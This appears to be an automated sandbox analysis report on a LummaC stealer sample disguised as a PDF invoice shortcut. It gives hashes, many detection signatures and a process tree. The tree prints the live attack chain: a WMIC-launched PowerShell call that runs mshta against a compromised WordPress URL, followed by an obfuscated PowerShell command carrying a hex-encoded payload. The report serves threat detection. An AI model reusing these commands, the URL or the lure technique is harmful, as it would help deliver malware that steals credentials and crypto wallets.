Edit tour
Windows
Analysis Report
InvoiceNr274728.pdf.lnk
Overview
General Information
| Sample name: | InvoiceNr274728.pdf.lnk |
| Analysis ID: | 1576131 |
| MD5: | a8bb763a94282ef70317e2a963222c83 |
| SHA1: | b807a016a1bb5a707b1b6a4b43c8277128d6aa5a |
| SHA256: | 77241fd91e48e51e517923885ba0b263b83b622a4304e6c9ccc6aec24ebff59b |
| Tags: | lnkLummaStealeruser-abuse_ch |
| Infos: |   |
 | |
Detection
LummaC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to create processes via WMI
Creates processes via WMI
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Classification
- System is w10x64
WMIC.exe (PID: 6496 cmdline: "C:\Window s\System32 \Wbem\wmic .exe" proc ess call c reate "pow ershell -w 1 . \W*\S *2\m*ht*e https://ag rizone.ae/ wp-content /plugins/j etpack/mod ules/markd own/jetpac khandler" MD5: C37F2F4F4B3CD128BDABCAEB2266A785) 
conhost.exe (PID: 6204 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 4308 cmdline: powershell -w 1 . \W *\S*2\m*ht *e https:/ /agrizone. ae/wp-cont ent/plugin s/jetpack/ modules/ma rkdown/jet packhandle r MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
mshta.exe (PID: 7112 cmdline: "C:\Window s\System32 \mshta.exe " https:// agrizone.a e/wp-conte nt/plugins /jetpack/m odules/mar kdown/jetp ackhandler MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 1892 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop $dd g = 'FADE7 26EC81DFD3 F47037F042 EF8401DB0C 673AC82C7F 07CF239824 D9F13D31CC 34A4815952 3B62408768 04D8D0F45C 63B7F305BF 972561BB38 3C5DE1B212 EAEBD93938 28392ADF2F 0C818B7C81 E13305EE79 AC57BB28F8 8705407339 B5E331A182 4C5337405F 9B12C273C2 90266C194F 7A0705F300 51A6E32F2A CD43AF7923 BC2036005A C59EB51135 9204F6F4BC DE3B99ABD8 00A9A63459 862B8E84CD 0BA528D00A F332E9705A 4A27397E9A 17C7E39030 32E2DC488D B38B105DA5 1E446807BA 7E2217F53F 814D7DFF38 8025E85364 B295A3466F C47DC34CB0 CF84AFBDE4 2CEECC66AA 2D82525AAD 120AEC3E36 9E138BFF16 B98DE2DCB9 9CC038EAE5 30A4450E05 5785F11F93 F9626451FF A2C582FD31 260CBA4ABF 728B5D2A43 B2B77EBAC5 A1FF29B98F 13FEACF472 C707190216 C4478A13BF 872160916A F8A462C7AC 1AE7AA3990 14F5D33F94 16D3651C53 3507433164 60F1A7EFF4 40BD1F9CB3 133972EC1C 0F37303766 3FF8A20281 7FAF61A067 4B405719CB 346D01663D EF90FF161D CE0E427F7B ADFEBEA79D 7633684FD9 BCAB66AE2A E94DDEC44D 348F21BCB3 3B4F1EAE78 FF4D7A0896 AE9CBBDA4E 387B16B1C4 867EC2F10B D2DFB713BF 84DB141742 54CFA25119 AB9F800B38 68CF767D6B 5461D28FC1 A0888C9B0C B9CC6F97DF 8C2B7F119C 86D2CBE1FE EECD690645 18B70102CE A17AB2C669 75FA7A2A64 BA1D939D55 41723AE5C7 5044F34859 DC3AEE9ADA 2A419E34CF 6DF00B386A 7E1B925773 72F9696826 1C1AC2F7CB 98088E1235 048E0FB9B3 7F514BE3B4 E708239582 199DEACF14 15C3D828FC F7DEE96256 0ED66CE2E9 E7907F7D52 A62A581F44 9E9F43846C B63BAE8AD8 AD8E177603 D184590900 21C4BDF04E B239533E7A 99FE772F29 25BD36168A 8814F84FC4 0CD27CEA9D 936C4E156E 8AD7F85B04 571885A70F 150A84EE63 6856A89A73 23443184A5 71298FED07 482FF23AE2 16F255FB19 E0056109F6 B6890B5E7E 6196667BDA A81489F138 F67E20AFF0 C8C58A47A9 41C9D21B94 EFF4A33CBC 64867BFA24 23D63E3912 9781093CAE 93E0453886 976453E45E 222EF0E53A F30A48879B DC920DE28B CE07A4ED4C E62B155720 4D44D88978 6856B66730 DAA95F6520 D040754A31 9074C680FE DAE9B63BC7 3DB7310260 ADE941A00B BCE675EB12 CAF9C7DBF5 B331DF9EB7 56037D0DE0 5CD36FC513 395FA62DF0 3DAF6A4C83 576ADCF4C3 3DB24C9920 BA435961E3 6AFFD378E5 82FB4151B7 19CA9C6798 884F052D9F FFD747C467 9721E7C66C B9ACF43FF5 76714A6C90 96518C0D73 0955D0890D BC5A98331C F010619F2C 726E3830B4 E1C94E8506 DDACD7CFB8 A84AE989FF 3C728F7E63 63835F270B 1CADA41995 5C8D42D62B AE3AFB5ECF 21925BB61C F480312040 4764AA4FEF 6DC8DF4512 AF02BD6568 A38F637046 B5BD8FD212 D338094975 D5DCAED466 E53F522DF2 2A4326708A 095AA8538E 09F426F64D C861782240 CB6B8D20F8 83A5248E17 8A70629397 6065E3276D 513D6B1FAF 2EA5142F90 300841BAD8 0EB5FB1C07 AA4061840A 5AC3559542 293DD6B7E4 212543BDD2 48AE78ACD7 BC131238B3 C705EC8EC0 D4535BC65C 834230BB53 E53AAEAFA4 A8B4CE2E0A BD625A6D78 02C5AFD2FA 5B18D582BD 1C3D1A33D9 0D3E1A890C